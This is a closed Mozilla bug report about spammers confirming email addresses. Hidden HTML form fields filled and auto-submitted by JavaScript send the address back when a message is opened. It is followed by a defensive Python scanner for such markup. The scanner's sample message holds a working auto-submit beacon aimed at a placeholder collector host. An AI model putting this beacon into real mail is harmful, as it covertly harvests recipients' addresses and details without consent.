Closed Bug 315352 Opened 20 years ago Closed 20 years ago

How spammers can identify your email without you doing anything.

Categories

(SeaMonkey :: MailNews: Message Display, defect)

x86
Windows XP
defect
Not set
critical

Tracking

(Not tracked)

RESOLVED DUPLICATE of bug 315351

People

(Reporter: healyd, Unassigned)


Details

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511

There is a potential hole in Mozilla's email account that allows a spammer to confirm an email address by just opening the email message. This is done by placing the email address in an HTML form's hidden field. The spammer can pass information such as browser, operating system, screen dimensions, colordepth, the size of your history in other hidden fields. A JavaScript form function is loaded when the page is loaded, and fills all the hidden fields with JavaScript variables. It then submits the form back to the spammer who uses Perl to gather intelligence such as IP Address and UserID. VOILA! The user has your email plus demographic information to sell to other spammers.

This happens when JavaScript is enabled. This also happens in Microsoft email clients; the only difference between you and them is that JavaScript is enabled in Microsoft and disabled by default in Mozilla.

Due to the far reaching implications that this could have on the war on spam, please disable all JavaScript interactions with HTML forms in your email. I placed an online demo on my website at http://www.geocities.com/overlord_77520/email_demographics.html

Reproducible: Always

Steps to Reproduce:
1. Go to my websites and download the zipped file.
2. Enable JavaScript and set up the CGI File.
3. Try to send an email with an HTML Form and see if the software sends the data back to the CGI program.

Actual Results:
The spammer has your email address.

Expected Results:
The security systems will disable the sending of the HTML Forms.

This is a MAJOR MAJOR MAJOR security flaw. If the spammers ever learn this, they will turn the spam wars heavily in their favor.
The fact that Mozilla's email JavaScript is disabled while Microsoft's is not could be your opportunity to exploit the marketshare by making fun of Microsoft's lack of security.
*** This bug has been marked as a duplicate of 315351 ***
Status: UNCONFIRMED → RESOLVED
Closed: 20 years ago
Resolution: --- → DUPLICATE
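A mail filter can flag the markup pattern this report describes (a form carrying hidden fields together with script that can submit it) before the message is rendered. The following is an added example, not code from the report or from Mozilla; the class and function names are hypothetical, the `on*` attribute check is a heuristic, and the sample message is constructed.

```python
from email import message_from_string
from html.parser import HTMLParser

# Constructed sample message (not taken from the report's demo).
SAMPLE = """\
From: sender@example.invalid
Subject: constructed sample
Content-Type: text/html; charset=utf-8

<html><body onload="document.forms[0].submit()">
<form action="http://collector.example.invalid/cgi-bin/log" method="post">
<input type="hidden" name="addr" value="reader@example.invalid">
</form></body></html>
"""

class FormBeaconScanner(HTMLParser):
    """Records forms, hidden inputs, script tags and inline event handlers."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # html.parser lowercases tag and attribute names
        if tag == "form":
            self.findings.append(("form", a.get("action") or ""))
        elif tag == "input" and (a.get("type") or "").lower() == "hidden":
            self.findings.append(("hidden-input", a.get("name") or ""))
        elif tag == "script":
            self.findings.append(("script", a.get("src") or "inline"))
        # Heuristic: attributes such as onload= or onclick= also run script.
        for name, _ in attrs:
            if name.startswith("on"):
                self.findings.append(("event-handler", f"{tag}[{name}]"))

def scan_message(raw):
    """Return findings for every text/html part of an RFC 822 message."""
    findings = []
    for part in message_from_string(raw).walk():
        if part.get_content_type() == "text/html":
            body = part.get_payload(decode=True)
            html = body.decode(part.get_content_charset() or "utf-8", "replace")
            scanner = FormBeaconScanner()
            scanner.feed(html)
            findings.extend(scanner.findings)
    return findings

def is_auto_submit_risk(findings):
    """True when a form appears alongside any script-capable markup."""
    kinds = {kind for kind, _ in findings}
    return "form" in kinds and bool(kinds & {"script", "event-handler"})
```

A filter built on this would quarantine or strip the HTML part when `is_auto_submit_risk` returns true, independently of whether the mail client has JavaScript enabled.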